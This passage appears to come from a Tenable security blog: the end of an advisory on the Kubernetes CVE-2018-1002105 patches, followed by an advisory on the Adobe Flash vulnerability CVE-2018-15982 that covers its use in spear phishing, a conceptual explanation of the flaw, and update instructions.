<ul><li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.10.md/#... v1.10.11</a></li>
<li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.11.md/#... v1.11.5</a></li>
<li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.12.md/#... v1.12.3</a></li>
<li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md/#... v1.13.0-rc.1</a></li></ul>

<p>Additionally, users of Red Hat’s OpenShift Container Platform should upgrade to the <a href="https://access.redhat.com/security/cve/cve-2018-1002105">patched versions</a> as soon as possible.</p>

<p>Lastly, please review the security tracker pages for <a href="https://security-tracker.debian.org/tracker/CVE-2018-1002105">Debian</a> and <a href="https://www.suse.com/security/cve/CVE-2018-1002105/">SUSE</a> distributions for up-to-date information on the availability of a Kubernetes patch on these platforms.</p>

<h2>Identifying affected systems</h2>
<p>A list of Nessus plugins to identify this vulnerability will appear <a href="https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-1002105%22)&sort=&page=1">here</a> as they’re released.</p>

<h2>Get more information</h2>
<ul><li><a href="https://github.com/kubernetes/kubernetes/issues/71411">Kubernetes: proxy request handling in kube-apiserver can leave vulnerable TCP connections</a></li>
<li><a href="https://access.redhat.com/security/cve/cve-2018-1002105">Red Hat: About CVE-2018-1002105</a></li>
<li><a href="https://security-tracker.debian.org/tracker/CVE-2018-1002105">Debian Security Tracker: CVE-2018-1002105</a></li>
<li><a href="https://www.suse.com/security/cve/CVE-2018-1002105/">SUSE Security Tracker: CVE-2018-1002105</a></li></ul>

<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>

Adobe has issued an out-of-band advisory for CVE-2018-15982. Through the use of a maliciously crafted RAR file, an attacker exploiting this vulnerability can take over the machine of users that run it.

Background

Adobe has released an out-of-band security bulletin. that includes patches for CVE-2018-15982, a critical arbitrary code execution vulnerability in Adobe Flash which has been used to allegedly attack Polyclinic No. 2, which is affiliated with the Presidential Administration of Russia. Users are encouraged to update all applications that incorporate Flash.

Analysis

The attack requires a user to open and run a malicious file that takes advantage of a dangling pointer, allowing the attacker to insert their code into the target’s memory, which Flash then executes. As with most code execution vulnerabilities, this vulnerability establishes a backdoor or similar foothold on the target.

In spear phishing campaigns, attacks are often designed to appear as legitimate emails, documents or tools, such as a Chrome extension that the organization often uses. In this case, attackers created a fake employee survey document that users understandably believed they needed to complete.

Source: 360 Core Security

Proof of concept

360 Core Security, one of the groups credited by Adobe with discovering this vulnerability, has an excellent technical write-up on how this attack works, and specifically how it was allegedly used against the Polyclinic site.

Once the payload is delivered, it disguises itself as an Nvidia driver application to further obfuscate infection.

Source: 360 Core Security

Solution

Adobe’s advisory provides the following information on updating Flash:

• Adobe recommends users of the Adobe Flash Player Desktop Runtime for Windows, macOS and Linux update to Adobe Flash Player 32.0.0.101 via the update mechanism within the product^* or by visiting the Adobe Flash Player Download Center.
• Adobe Flash Player installed with Google Chrome will be automatically updated to the latest Google Chrome version, which will include Adobe Flash Player 32.0.0.101 for Windows, macOS, Linux and Chrome OS.
• Adobe Flash Player installed with Microsoft Edge and Internet Explorer 11 for Windows 10 and 8.1 will be automatically updated to the latest version, which will include Adobe Flash Player 32.0.0.101.

^*Note: Users who have selected the option to 'Allow Adobe to install updates' will receive the update automatically. Users who do not have the 'Allow Adobe to install updates' option enabled can install the update via the update mechanism within the product when prompted.

Identifying affected systems

A list of Nessus plugins to identify this vulnerability will appear here as they’re released.

Get more information

• Adobe Advisory
• 360 Core Security Blog

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.